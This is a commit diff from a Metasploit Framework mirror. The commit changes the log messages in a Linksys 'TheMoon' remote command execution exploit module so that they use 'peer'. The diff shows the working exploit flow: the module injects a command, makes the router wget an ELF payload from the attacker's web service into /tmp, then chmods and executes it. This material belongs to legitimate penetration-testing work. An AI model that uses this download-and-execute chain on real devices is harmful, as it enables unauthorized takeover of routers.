infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

replaced rhost by peer

bug/bundler_fix
Michael Messner 2014-02-18 21:01:50 +01:00
parent 66e2148197
commit 3a8de6e124
1 changed files with 21 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
modules/exploits/linux/http/linksys_themoon_exec.rb
View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
return res
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
vprint_error("#{peer} - Failed to connect to the web server")
return nil
end
end
@ -107,34 +107,34 @@ class Metasploit3 < Msf::Exploit::Remote
#
# testing Login
#
print_status("#{rhost}:#{rport} - Trying to access the vulnerable url")
print_status("#{peer} - Trying to access the vulnerable url")
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
})
if res.nil? or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible")
fail_with(Failure::NoAccess, "#{peer} - No successful login possible")
end
if [200, 301, 302].include?(res.code)
print_good("#{rhost}:#{rport} - Successfully accessed #{uri}")
print_good("#{peer} - Successfully accessed #{uri}")
else
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible")
fail_with(Failure::NoAccess, "#{peer} - No successful login possible")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
if target.name =~ /CMD/
if not (datastore['CMD'])
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
fail_with(Failure::BadConfig, "#{peer} - Only the cmd/generic payload is compatible")
end
cmd = payload.encoded
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
else
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
print_status("#{peer} - Blind Exploitation - unknown Exploitation state")
end
return
end
@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
print_status("#{peer} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
@ -177,19 +177,19 @@ class Metasploit3 < Msf::Exploit::Remote
datastore['SSL'] = true if ssl_restore
end
print_status("#{rhost}:#{rport} - Asking the Linksys device to download and execute #{service_url}")
print_status("#{peer} - Asking the Linksys device to download and execute #{service_url}")
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
end
# wait for payload download
if (datastore['DOWNHOST'])
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
print_status("#{peer} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
select(nil, nil, nil, datastore['HTTP_DELAY'])
else
wait_linux_payload
@ -200,20 +200,20 @@ class Metasploit3 < Msf::Exploit::Remote
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
print_status("#{peer} - Asking the Linksys device to chmod #{downfile}")
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
end
#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
print_status("#{peer} - Asking the Linksys device to execute #{downfile}")
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
end
@ -222,24 +222,24 @@ class Metasploit3 < Msf::Exploit::Remote
# Handle incoming requests from the server
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
print_status("#{peer} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
# wait for the data to be sent
def wait_linux_payload
print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
print_status("#{peer} - Waiting for the victim to request the ELF payload...")
waited = 0
while (not @elf_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
fail_with(Failure::Unknown, "#{peer} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
end
end
end